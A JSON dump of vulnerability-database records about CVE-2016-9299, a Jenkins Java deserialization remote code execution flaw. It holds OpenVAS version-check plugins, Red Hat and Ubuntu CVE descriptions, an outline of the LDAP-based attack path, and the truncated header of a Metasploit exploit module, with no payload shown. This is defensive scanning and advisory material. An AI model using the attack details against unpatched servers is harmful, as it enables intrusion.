{"id": "OPENVAS:1361412562310108062", "type": "openvas", "bulletinFamily": "scanner", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "published": "2017-01-30T00:00:00", "modified": "2019-10-17T00:00:00", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108062", "reporter": "Copyright (c) 2017 Greenbone Networks GmbH", "references": ["http://www.securityfocus.com/bid/94281", "https://jenkins.io/security/advisory/2016-11-16/"], "cvelist": ["CVE-2016-9299"], "lastseen": "2019-10-18T15:17:20", "viewCount": 33, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2016-9299"]}, {"type": "fedora", "idList": ["FEDORA:00FE3602E41B", "FEDORA:ACB376074FEE", "FEDORA:CCC6D6078F5C", "FEDORA:E7173602E415"]}, {"type": "freebsd", "idList": ["27EEE66D-9474-44A5-B830-21EC12A1C307"]}, {"type": "github", "idList": ["GHSA-2X9H-H3C4-WQQH"]}, {"type": "impervablog", "idList": ["IMPERVABLOG:4F187FDBA230373382F26BA12E00F8E7"]}, {"type": "kitploit", "idList": ["KITPLOIT:1207079539580982634"]}, {"type": "mageia", "idList": ["MGASA-2016-0406"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783274"]}, {"type": "nessus", "idList": ["FEDORA_2016-368780879D.NASL", "FEDORA_2016-93679A91DF.NASL", "FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310108063", "OPENVAS:1361412562310871954", "OPENVAS:1361412562310872082", "OPENVAS:1361412562310872442", "OPENVAS:1361412562310872446"]}, {"type": "osv", "idList": ["OSV:GHSA-2X9H-H3C4-WQQH"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:147665"]}, {"type": "redhatcve", "idList": ["RH:CVE-2016-9299"]}, {"type": "seebug", "idList": ["SSV:92557"]}, {"type": "ubuntucve", "idList": ["UB:CVE-2016-9299"]}, {"type": "zdt", "idList": 
["1337DAY-ID-30370"]}]}, "score": {"value": 0.2, "vector": "NONE"}, "backreferences": {"references": [{"type": "fedora", "idList": ["FEDORA:E7173602E415"]}, {"type": "freebsd", "idList": ["27EEE66D-9474-44A5-B830-21EC12A1C307"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/LINUX/MISC/JENKINS_LDAP_DESERIALIZE"]}, {"type": "myhack58", "idList": ["MYHACK58:62201783274"]}, {"type": "nessus", "idList": ["FREEBSD_PKG_27EEE66D947444A5B83021EC12A1C307.NASL"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310872442"]}, {"type": "seebug", "idList": ["SSV:92557"]}, {"type": "zdt", "idList": ["1337DAY-ID-30370"]}]}, "exploitation": null, "vulnersScore": 0.2}, "pluginID": "1361412562310108062", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108062\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Windows)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_windows\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing 
protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "naslFamily": "Web application abuses", "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1659988328, "score": 1659977468}, "_internal": {"score_hash": "31ff72d3172236302aab528e19c8c162"}}
{"openvas": [{"lastseen": "2019-05-29T18:35:02", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310871954", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310871954", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.871954\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:21:40 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/QFJT3TVJVZH5CAVZOY7CPBY3DK7E4CPO\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-10-18T15:19:23", "description": "This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.", "cvss3": {}, "published": "2017-01-30T00:00:00", "type": "openvas", "title": "Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-17T00:00:00", "id": "OPENVAS:1361412562310108063", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310108063", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\n#\n# Authors:\n# Christian Fischer <christian.fischer@greenbone.net>\n#\n# Copyright:\n# Copyright (c) 2017 Greenbone Networks GmbH\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:jenkins:jenkins\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.108063\");\n script_version(\"2019-10-17T11:27:19+0000\");\n script_cve_id(\"CVE-2016-9299\");\n script_bugtraq_id(94281);\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-10-17 11:27:19 +0000 (Thu, 17 Oct 2019)\");\n script_tag(name:\"creation_date\", value:\"2017-01-30 13:00:00 +0100 (Mon, 30 Jan 2017)\");\n\n script_name(\"Jenkins 'Java Deserialization' Remote Code Execution Vulnerability (Linux)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2017 Greenbone Networks GmbH\");\n script_family(\"Web application abuses\");\n script_dependencies(\"gb_jenkins_consolidation.nasl\", \"os_detection.nasl\");\n script_mandatory_keys(\"jenkins/detected\", \"Host/runs_unixoide\");\n\n script_xref(name:\"URL\", value:\"https://jenkins.io/security/advisory/2016-11-16/\");\n script_xref(name:\"URL\", value:\"http://www.securityfocus.com/bid/94281\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Jenkins and is prone to\n a remote code execution vulnerability.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The flaw is due to an Jenkins allowing to transfer a serialized Java object to the Jenkins CLI,\n making Jenkins connect to an attacker-controlled LDAP server, which in turn can send a serialized payload leading\n to code execution, bypassing existing 
protection mechanisms.\");\n\n script_tag(name:\"impact\", value:\"Successfully exploiting this issue allows attackers to execute arbitrary code in the context of\n the affected application. Failed exploits will result in denial-of-service conditions.\");\n\n script_tag(name:\"affected\", value:\"Jenkins LTS 2.19.2 and prior, Jenkins 2.31 and prior.\");\n\n script_tag(name:\"solution\", value:\"Upgrade Jenkins to 2.32 or later / Jenkins LTS to 2.19.3 or\n later.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"remote_banner_unreliable\");\n exit(0);\n}\n\ninclude(\"host_details.inc\");\ninclude(\"version_func.inc\");\n\nif( ! port = get_app_port( cpe:CPE ) )\n exit(0);\n\nif( ! infos = get_app_full( cpe:CPE, port:port ) )\n exit(0);\n\nif( ! version = infos[\"version\"])\n exit(0);\n\nlocation = infos[\"location\"];\nproto = infos[\"proto\"];\n\nif( get_kb_item( \"jenkins/\" + port + \"/is_lts\" ) ) {\n if( version_is_less( version:version, test_version:\"2.19.3\" ) ) {\n vuln = TRUE;\n fix = \"2.19.3\";\n }\n} else {\n if( version_is_less( version:version, test_version:\"2.32\" ) ) {\n vuln = TRUE;\n fix = \"2.32\";\n }\n}\n\nif( vuln ) {\n report = report_fixed_ver( installed_version:version, fixed_version:fix, install_path:location );\n security_message( port:port, data:report, proto:proto );\n exit( 0 );\n}\n\nexit( 99 );\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2016-12-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-368780879d", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872082", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872082", "sourceData": 
"###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-368780879d\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2016 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872082\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2016-12-07 05:27:04 +0100 (Wed, 07 Dec 2016)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-368780879d\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 
25\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-368780879d\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZW2KUKYLNLVDB7STLHLYALCUFLEGCRM6\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2016 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC25\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC25\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc25\", rls:\"FC25\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:31", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins-remoting FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872446", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872446", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# 
it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872446\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:14 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins-remoting FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins-remoting'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins-remoting on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/XKRLBXFPKTEBV4JI66GC2KQDE3TLZMYR\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n 
script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins-remoting\", rpm:\"jenkins-remoting~2.62.3~1.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:34:34", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2017-03-07T00:00:00", "type": "openvas", "title": "Fedora Update for jenkins FEDORA-2016-93679a91df", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310872442", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310872442", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for jenkins FEDORA-2016-93679a91df\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2017 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.872442\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2017-03-07 05:48:08 +0100 (Tue, 07 Mar 2017)\");\n script_cve_id(\"CVE-2016-9299\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for jenkins FEDORA-2016-93679a91df\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'jenkins'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"affected\", value:\"jenkins on Fedora 24\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"FEDORA\", value:\"2016-93679a91df\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/ZE7XYOLIPAJFIIPWZPAVZYEAOAT6LHIJ\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2017 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC24\");\n\n 
exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC24\")\n{\n\n if ((res = isrpmvuln(pkg:\"jenkins\", rpm:\"jenkins~1.651.3~2.fc24\", rls:\"FC24\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "redhatcve": [{"lastseen": "2021-09-02T22:52:37", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows remote attackers to execute arbitrary code via a crafted serialized Java object, which triggers an LDAP query to a third-party server.\n#### Mitigation\n\n<https://github.com/jenkinsci-cert/SECURITY-218> \n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-11-15T10:47:41", "type": "redhatcve", "title": "CVE-2016-9299", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2019-10-12T00:55:37", "id": "RH:CVE-2016-9299", "href": "https://access.redhat.com/security/cve/cve-2016-9299", "cvss": {"score": 
7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "ubuntucve": [{"lastseen": "2022-08-04T14:06:23", "description": "The remoting module in Jenkins before 2.32 and LTS before 2.19.3 allows\nremote attackers to execute arbitrary code via a crafted serialized Java\nobject, which triggers an LDAP query to a third-party server.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-01-12T00:00:00", "type": "ubuntucve", "title": "CVE-2016-9299", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2016-9299"], "modified": "2017-01-12T00:00:00", "id": "UB:CVE-2016-9299", "href": "https://ubuntu.com/security/CVE-2016-9299", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "zdt": [{"lastseen": "2018-05-18T18:37:19", "description": "Exploit for linux platform in category remote exploits", "cvss3": {}, "published": "2018-05-18T00:00:00", "type": "zdt", "title": "Jenkins CLI - HTTP Java Deserialization Exploit", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-9299"], "modified": "2018-05-18T00:00:00", "id": "1337DAY-ID-30370", "href": "https://0day.today/exploit/description/30370", 
"sourceData": "##\r\n# This module requires Metasploit: https://metasploit.com/download\r\n# Current source: https://github.com/rapid7/metasploit-framework\r\n##\r\n \r\nclass MetasploitModule < Msf::Exploit::Remote\r\n Rank = ExcellentRanking\r\n \r\n STAGE1 = 